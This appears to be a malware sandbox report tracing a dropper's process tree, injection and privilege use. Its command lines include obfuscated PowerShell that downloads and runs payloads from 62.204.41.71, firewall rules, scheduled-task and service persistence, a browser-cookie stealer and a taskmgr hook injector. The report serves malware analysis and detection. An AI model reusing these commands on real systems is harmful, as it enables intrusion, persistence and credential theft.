Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	Graphics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
5020	pub2.exe
5020	pub2.exe
4328	jfiag3g_gg.exe
4328	jfiag3g_gg.exe
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2180
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

5020 pub2.exe

pid	process
2180

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exeSoCleanInst.exetaskkill.exemd9_1sjm.exeGraphics.exesvchost.exeGraphics.execsrss.exe

description	pid	process
Token: SeCreateTokenPrivilege	3172	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3172	Install.exe
Token: SeLockMemoryPrivilege	3172	Install.exe
Token: SeIncreaseQuotaPrivilege	3172	Install.exe
Token: SeMachineAccountPrivilege	3172	Install.exe
Token: SeTcbPrivilege	3172	Install.exe
Token: SeSecurityPrivilege	3172	Install.exe
Token: SeTakeOwnershipPrivilege	3172	Install.exe
Token: SeLoadDriverPrivilege	3172	Install.exe
Token: SeSystemProfilePrivilege	3172	Install.exe
Token: SeSystemtimePrivilege	3172	Install.exe
Token: SeProfSingleProcessPrivilege	3172	Install.exe
Token: SeIncBasePriorityPrivilege	3172	Install.exe
Token: SeCreatePagefilePrivilege	3172	Install.exe
Token: SeCreatePermanentPrivilege	3172	Install.exe
Token: SeBackupPrivilege	3172	Install.exe
Token: SeRestorePrivilege	3172	Install.exe
Token: SeShutdownPrivilege	3172	Install.exe
Token: SeDebugPrivilege	3172	Install.exe
Token: SeAuditPrivilege	3172	Install.exe
Token: SeSystemEnvironmentPrivilege	3172	Install.exe
Token: SeChangeNotifyPrivilege	3172	Install.exe
Token: SeRemoteShutdownPrivilege	3172	Install.exe
Token: SeUndockPrivilege	3172	Install.exe
Token: SeSyncAgentPrivilege	3172	Install.exe
Token: SeEnableDelegationPrivilege	3172	Install.exe
Token: SeManageVolumePrivilege	3172	Install.exe
Token: SeImpersonatePrivilege	3172	Install.exe
Token: SeCreateGlobalPrivilege	3172	Install.exe
Token: 31	3172	Install.exe
Token: 32	3172	Install.exe
Token: 33	3172	Install.exe
Token: 34	3172	Install.exe
Token: 35	3172	Install.exe
Token: SeDebugPrivilege	2440	SoCleanInst.exe
Token: SeDebugPrivilege	5060	taskkill.exe
Token: SeManageVolumePrivilege	3736	md9_1sjm.exe
Token: SeDebugPrivilege	3704	Graphics.exe
Token: SeImpersonatePrivilege	3704	Graphics.exe
Token: SeTcbPrivilege	4076	svchost.exe
Token: SeTcbPrivilege	4076	svchost.exe
Token: SeSystemEnvironmentPrivilege	4848	Graphics.exe
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeManageVolumePrivilege	3736	md9_1sjm.exe
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeBackupPrivilege	4076	svchost.exe
Token: SeRestorePrivilege	4076	svchost.exe
Token: SeBackupPrivilege	4076	svchost.exe
Token: SeRestorePrivilege	4076	svchost.exe
Token: SeSystemEnvironmentPrivilege	3832	csrss.exe
Token: SeManageVolumePrivilege	3736	md9_1sjm.exe
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeManageVolumePrivilege	3736	md9_1sjm.exe
Token: SeManageVolumePrivilege	3736	md9_1sjm.exe
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180

Suspicious use of SetWindowsHookEx 23 IoCs

Processes:

UhnvAZcIygWZ3LrV8uPMs7Jc.exezXWgmHlK1sP9XbVWuGjIwYp9.exetZ_0knsT_hz1C495w9qaevhV.exerNd8peyL7zbmaO51tNRNMwxe.exeehc6FDCfzr_KirOWDyp49Id8.exekDhxf2bxikXcYAzduDonfU3S.exeSX2wwq5OZKtiQHH5bJeLpAHt.exem7aIxPh1BLVfzyXxvQo19Bck.exexpp1lLCqx97thfsxvokyBy6Q.exerhvduHLKOQ9qOqWdv1W8YeRU.exeJqFnhoTm2vjZGYaNNjp0nVmm.exefKa_Nzj7pB329RyFKr54Iqgc.exe1QHmNz9YPqkCI_7wBsa8Qvlx.exe1fBWJFpw0sDiUM61e33j_A4a.exeGA8sQMFF4k8SJwYdDMrpsdvt.exeFzBakAwWGn7br_VtGPiU94YM.exeInstall.exeinEo7AEwEWCJR_W1HiZjR7D0.exeInstall.exeYTpjZzIU44RuWqPOzhDS5nfj.exe1HJ0C.exeCMEE5.exe

pid	process
3844	UhnvAZcIygWZ3LrV8uPMs7Jc.exe
5032	zXWgmHlK1sP9XbVWuGjIwYp9.exe
1200	tZ_0knsT_hz1C495w9qaevhV.exe
644	rNd8peyL7zbmaO51tNRNMwxe.exe
4504	ehc6FDCfzr_KirOWDyp49Id8.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe
2016	SX2wwq5OZKtiQHH5bJeLpAHt.exe
484	m7aIxPh1BLVfzyXxvQo19Bck.exe
2004	xpp1lLCqx97thfsxvokyBy6Q.exe
4204	rhvduHLKOQ9qOqWdv1W8YeRU.exe
4428	JqFnhoTm2vjZGYaNNjp0nVmm.exe
3104	fKa_Nzj7pB329RyFKr54Iqgc.exe
4664	1QHmNz9YPqkCI_7wBsa8Qvlx.exe
4960	1fBWJFpw0sDiUM61e33j_A4a.exe
3576	GA8sQMFF4k8SJwYdDMrpsdvt.exe
1888	FzBakAwWGn7br_VtGPiU94YM.exe
3576	GA8sQMFF4k8SJwYdDMrpsdvt.exe
1776	Install.exe
1860	inEo7AEwEWCJR_W1HiZjR7D0.exe
4984	Install.exe
2008	YTpjZzIU44RuWqPOzhDS5nfj.exe
3260	1HJ0C.exe
1412	CMEE5.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exeFiles.exeInstall.execmd.exesvchost.exeGraphics.execmd.execsrss.exeFile.exe

description	pid	process	target process
PID 4160 wrote to memory of 2440	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	SoCleanInst.exe
PID 4160 wrote to memory of 2440	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	SoCleanInst.exe
PID 4160 wrote to memory of 3736	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	md9_1sjm.exe
PID 4160 wrote to memory of 3736	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	md9_1sjm.exe
PID 4160 wrote to memory of 3736	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	md9_1sjm.exe
PID 4160 wrote to memory of 3860	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Folder.exe
PID 4160 wrote to memory of 3860	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Folder.exe
PID 4160 wrote to memory of 3860	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Folder.exe
PID 4160 wrote to memory of 3704	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Graphics.exe
PID 4160 wrote to memory of 3704	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Graphics.exe
PID 4160 wrote to memory of 3704	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Graphics.exe
PID 4160 wrote to memory of 3512	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Updbdate.exe
PID 4160 wrote to memory of 3512	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Updbdate.exe
PID 4160 wrote to memory of 3512	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Updbdate.exe
PID 4160 wrote to memory of 3172	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Install.exe
PID 4160 wrote to memory of 3172	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Install.exe
PID 4160 wrote to memory of 3172	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Install.exe
PID 4160 wrote to memory of 4000	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Files.exe
PID 4160 wrote to memory of 4000	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Files.exe
PID 4160 wrote to memory of 4000	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	Files.exe
PID 4160 wrote to memory of 5020	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	pub2.exe
PID 4160 wrote to memory of 5020	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	pub2.exe
PID 4160 wrote to memory of 5020	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	pub2.exe
PID 4160 wrote to memory of 2040	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	File.exe
PID 4160 wrote to memory of 2040	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	File.exe
PID 4160 wrote to memory of 2040	4160	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe	File.exe
PID 4000 wrote to memory of 4624	4000	Files.exe	jfiag3g_gg.exe
PID 4000 wrote to memory of 4624	4000	Files.exe	jfiag3g_gg.exe
PID 4000 wrote to memory of 4624	4000	Files.exe	jfiag3g_gg.exe
PID 3172 wrote to memory of 2788	3172	Install.exe	cmd.exe
PID 3172 wrote to memory of 2788	3172	Install.exe	cmd.exe
PID 3172 wrote to memory of 2788	3172	Install.exe	cmd.exe
PID 2788 wrote to memory of 5060	2788	cmd.exe	taskkill.exe
PID 2788 wrote to memory of 5060	2788	cmd.exe	taskkill.exe
PID 2788 wrote to memory of 5060	2788	cmd.exe	taskkill.exe
PID 4000 wrote to memory of 4328	4000	Files.exe	jfiag3g_gg.exe
PID 4000 wrote to memory of 4328	4000	Files.exe	jfiag3g_gg.exe
PID 4000 wrote to memory of 4328	4000	Files.exe	jfiag3g_gg.exe
PID 4076 wrote to memory of 4848	4076	svchost.exe	Graphics.exe
PID 4076 wrote to memory of 4848	4076	svchost.exe	Graphics.exe
PID 4076 wrote to memory of 4848	4076	svchost.exe	Graphics.exe
PID 4848 wrote to memory of 3140	4848	Graphics.exe	cmd.exe
PID 4848 wrote to memory of 3140	4848	Graphics.exe	cmd.exe
PID 3140 wrote to memory of 3300	3140	cmd.exe	netsh.exe
PID 3140 wrote to memory of 3300	3140	cmd.exe	netsh.exe
PID 4848 wrote to memory of 3832	4848	Graphics.exe	csrss.exe
PID 4848 wrote to memory of 3832	4848	Graphics.exe	csrss.exe
PID 4848 wrote to memory of 3832	4848	Graphics.exe	csrss.exe
PID 4076 wrote to memory of 3060	4076	svchost.exe	schtasks.exe
PID 4076 wrote to memory of 3060	4076	svchost.exe	schtasks.exe
PID 3832 wrote to memory of 2148	3832	csrss.exe	injector.exe
PID 3832 wrote to memory of 2148	3832	csrss.exe	injector.exe
PID 2040 wrote to memory of 1292	2040	File.exe	4BvMQEpgPl3TslO0ClNsiV6z.exe
PID 2040 wrote to memory of 1292	2040	File.exe	4BvMQEpgPl3TslO0ClNsiV6z.exe
PID 2040 wrote to memory of 644	2040	File.exe	rNd8peyL7zbmaO51tNRNMwxe.exe
PID 2040 wrote to memory of 644	2040	File.exe	rNd8peyL7zbmaO51tNRNMwxe.exe
PID 2040 wrote to memory of 644	2040	File.exe	rNd8peyL7zbmaO51tNRNMwxe.exe
PID 2040 wrote to memory of 3844	2040	File.exe	UhnvAZcIygWZ3LrV8uPMs7Jc.exe
PID 2040 wrote to memory of 3844	2040	File.exe	UhnvAZcIygWZ3LrV8uPMs7Jc.exe
PID 2040 wrote to memory of 3844	2040	File.exe	UhnvAZcIygWZ3LrV8uPMs7Jc.exe
PID 2040 wrote to memory of 3104	2040	File.exe	fKa_Nzj7pB329RyFKr54Iqgc.exe
PID 2040 wrote to memory of 3104	2040	File.exe	fKa_Nzj7pB329RyFKr54Iqgc.exe
PID 2040 wrote to memory of 3104	2040	File.exe	fKa_Nzj7pB329RyFKr54Iqgc.exe
PID 2040 wrote to memory of 1200	2040	File.exe	tZ_0knsT_hz1C495w9qaevhV.exe

C:\Users\Admin\AppData\Local\Temp\9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe
"C:\Users\Admin\AppData\Local\Temp\9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4160

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:3860

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3704

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:3300

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3832

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:3060

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3704 -s 752
3⤵
- Program crash
PID:4880

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:3512

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5060

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4000

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4624

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4328

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5020

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2040

C:\Users\Admin\Pictures\Adobe Films\4BvMQEpgPl3TslO0ClNsiV6z.exe
"C:\Users\Admin\Pictures\Adobe Films\4BvMQEpgPl3TslO0ClNsiV6z.exe"
3⤵
- Executes dropped EXE
PID:1292

C:\Users\Admin\Pictures\Adobe Films\UhnvAZcIygWZ3LrV8uPMs7Jc.exe
"C:\Users\Admin\Pictures\Adobe Films\UhnvAZcIygWZ3LrV8uPMs7Jc.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3844

C:\Users\Admin\Documents\YTpjZzIU44RuWqPOzhDS5nfj.exe
"C:\Users\Admin\Documents\YTpjZzIU44RuWqPOzhDS5nfj.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2008

C:\Users\Admin\Pictures\Adobe Films\pWcjcvAGHdDFvECmr78gwGIc.exe
"C:\Users\Admin\Pictures\Adobe Films\pWcjcvAGHdDFvECmr78gwGIc.exe"
5⤵
- Executes dropped EXE
PID:4052

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5064

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2800

C:\Users\Admin\Pictures\Adobe Films\rNd8peyL7zbmaO51tNRNMwxe.exe
"C:\Users\Admin\Pictures\Adobe Films\rNd8peyL7zbmaO51tNRNMwxe.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:644

C:\Users\Admin\Pictures\Adobe Films\zXWgmHlK1sP9XbVWuGjIwYp9.exe
"C:\Users\Admin\Pictures\Adobe Films\zXWgmHlK1sP9XbVWuGjIwYp9.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5032

C:\Users\Admin\Pictures\Adobe Films\MoWVAJgqRrxeMGVZscqOEjOz.exe
"C:\Users\Admin\Pictures\Adobe Films\MoWVAJgqRrxeMGVZscqOEjOz.exe"
3⤵
- Executes dropped EXE
PID:4348

C:\Users\Admin\Pictures\Adobe Films\rhvduHLKOQ9qOqWdv1W8YeRU.exe
"C:\Users\Admin\Pictures\Adobe Films\rhvduHLKOQ9qOqWdv1W8YeRU.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 460
4⤵
- Program crash
PID:1420

C:\Users\Admin\Pictures\Adobe Films\m7aIxPh1BLVfzyXxvQo19Bck.exe
"C:\Users\Admin\Pictures\Adobe Films\m7aIxPh1BLVfzyXxvQo19Bck.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zepqhqjs\
4⤵
PID:3084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sjkmofun.exe" C:\Windows\SysWOW64\zepqhqjs\
4⤵
PID:544

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create zepqhqjs binPath= "C:\Windows\SysWOW64\zepqhqjs\sjkmofun.exe /d\"C:\Users\Admin\Pictures\Adobe Films\m7aIxPh1BLVfzyXxvQo19Bck.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:1052

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description zepqhqjs "wifi internet conection"
4⤵
PID:432

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start zepqhqjs
4⤵
PID:4308

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:4792

C:\Users\Admin\Pictures\Adobe Films\1fBWJFpw0sDiUM61e33j_A4a.exe
"C:\Users\Admin\Pictures\Adobe Films\1fBWJFpw0sDiUM61e33j_A4a.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 460
4⤵
- Program crash
PID:3488

C:\Users\Admin\Pictures\Adobe Films\FzBakAwWGn7br_VtGPiU94YM.exe
"C:\Users\Admin\Pictures\Adobe Films\FzBakAwWGn7br_VtGPiU94YM.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:5128

C:\Users\Admin\Pictures\Adobe Films\1QHmNz9YPqkCI_7wBsa8Qvlx.exe
"C:\Users\Admin\Pictures\Adobe Films\1QHmNz9YPqkCI_7wBsa8Qvlx.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4664

C:\Users\Admin\Pictures\Adobe Films\inEo7AEwEWCJR_W1HiZjR7D0.exe
"C:\Users\Admin\Pictures\Adobe Films\inEo7AEwEWCJR_W1HiZjR7D0.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1860

C:\Users\Admin\AppData\Local\Temp\1HJ0C.exe
"C:\Users\Admin\AppData\Local\Temp\1HJ0C.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3260

C:\Users\Admin\AppData\Local\Temp\CMEE5.exe
"C:\Users\Admin\AppData\Local\Temp\CMEE5.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1412

C:\Users\Admin\AppData\Local\Temp\LG2H4.exe
"C:\Users\Admin\AppData\Local\Temp\LG2H4.exe"
4⤵
- Executes dropped EXE
PID:4660

C:\Users\Admin\AppData\Local\Temp\2KK8K.exe
"C:\Users\Admin\AppData\Local\Temp\2KK8K.exe"
4⤵
PID:3208

C:\Users\Admin\Pictures\Adobe Films\CK3qWp4XpBUCZcEit4qvaFp5.exe
"C:\Users\Admin\Pictures\Adobe Films\CK3qWp4XpBUCZcEit4qvaFp5.exe"
3⤵
- Executes dropped EXE
PID:1944

C:\Users\Admin\Pictures\Adobe Films\SX2wwq5OZKtiQHH5bJeLpAHt.exe
"C:\Users\Admin\Pictures\Adobe Films\SX2wwq5OZKtiQHH5bJeLpAHt.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2016

C:\Users\Admin\AppData\Local\Temp\7zSBDC6.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1776

C:\Users\Admin\AppData\Local\Temp\7zSD313.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4984

C:\Users\Admin\Pictures\Adobe Films\xpp1lLCqx97thfsxvokyBy6Q.exe
"C:\Users\Admin\Pictures\Adobe Films\xpp1lLCqx97thfsxvokyBy6Q.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2004

C:\Users\Admin\Pictures\Adobe Films\GA8sQMFF4k8SJwYdDMrpsdvt.exe
"C:\Users\Admin\Pictures\Adobe Films\GA8sQMFF4k8SJwYdDMrpsdvt.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:3456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
